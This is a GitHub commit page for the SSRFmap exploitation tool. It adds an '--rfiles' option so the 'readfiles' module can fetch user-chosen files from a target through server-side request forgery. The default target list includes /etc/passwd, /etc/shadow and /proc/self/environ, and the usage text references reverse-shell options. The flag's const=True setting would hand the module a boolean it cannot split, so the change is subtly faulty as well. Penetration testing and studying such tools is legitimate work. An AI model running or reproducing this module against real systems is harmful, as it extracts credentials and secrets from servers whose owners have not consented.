Merge pull request swisskyrepo#35 from ScarletTeam/master

Allows readfiles module to read specific files specified in a parameter when starting the ssrfmap.py script
Runningoutoftimeu · Feb 3, 2021 · c7922ba · c7922ba
2 parents 3efa3e4 + d01c58a
commit c7922ba
Show file tree

Hide file tree

Showing 2 changed files with 12 additions and 5 deletions.
diff --git a/modules/readfiles.py b/modules/readfiles.py
@@ -1,19 +1,21 @@
 from core.utils import *
 import logging
 import os
+from argparse import ArgumentParser
 
 name          = "readfiles"
 description   = "Read files from the target"
 author        = "Swissky"
 documentation = []
 
 class exploit():
-    files = ["/etc/passwd", "/etc/lsb-release", "/etc/shadow", "/etc/hosts", "\/\/etc/passwd", "/proc/self/environ", "/proc/self/cmdline", "/proc/self/cwd/index.php", "/proc/self/cwd/application.py", "/proc/self/cwd/main.py", "/proc/self/exe"]
-
+
     def __init__(self, requester, args):
         logging.info("Module '{}' launched !".format(name))
-
+        self.files = args.targetfiles.split(',') if args.targetfiles != None else ["/etc/passwd", "/etc/lsb-release", "/etc/shadow", "/etc/hosts", "\/\/etc/passwd", "/proc/self/environ", "/proc/self/cmdline", "/proc/self/cwd/index.php", "/proc/self/cwd/application.py", "/proc/self/cwd/main.py", "/proc/self/exe"]   
+
         r = requester.do_request(args.param, "")
+
         if r != None:
             default = r.text
 
@@ -36,3 +38,6 @@ def __init__(self, requester, args):
                     logging.info("\033[32mWriting file\033[0m : {} to {}".format(f, directory + "/" + filename))
                     with open(directory + "/" + filename, 'w') as f:
                         f.write(diff)
+
+        else:
+            print("Empty response")
diff --git a/ssrfmap.py b/ssrfmap.py
@@ -23,6 +23,7 @@ def parse_args():
     python ssrfmap.py -r data/request.txt -p url -m redis
     python ssrfmap.py -r data/request.txt -p url -m portscan --ssl --uagent "SSRFmapAgent"
     python ssrfmap.py -r data/request.txt -p url -m redis --lhost=127.0.0.1 --lport=4242 -l 4242
+    python ssrfmap.py -r data/request.txt -p url -m readfiles --rfiles 
     '''
     parser = argparse.ArgumentParser(epilog=example_text, formatter_class=argparse.RawDescriptionHelpFormatter)
     parser.add_argument('-r', action ='store', dest='reqfile', help="SSRF Request file")
@@ -32,10 +33,11 @@ def parse_args():
     parser.add_argument('-v', action ='store', dest='verbose', help="Enable verbosity", nargs='?', const=True)
     parser.add_argument('--lhost', action ='store', dest='lhost',     help="LHOST reverse shell")
     parser.add_argument('--lport', action ='store', dest='lport',     help="LPORT reverse shell")
+    parser.add_argument('--rfiles', action ='store', dest='targetfiles', help="Files to read with readfiles module", nargs='?', const=True)
     parser.add_argument('--uagent',action ='store', dest='useragent', help="User Agent to use")
     parser.add_argument('--ssl',   action ='store', dest='ssl',       help="Use HTTPS without verification", nargs='?', const=True)
     parser.add_argument('--level', action ='store', dest='level',     help="Level of test to perform (1-5, default: 1)", nargs='?', const=1, default=1, type=int)
-    results = parser.parse_args() 
+    results = parser.parse_args()
 
     if results.reqfile == None:
         parser.print_help()
@@ -55,4 +57,4 @@ def parse_args():
 
     # SSRFmap
     args = parse_args()
-    ssrf = SSRF(args)
+    ssrf = SSRF(args)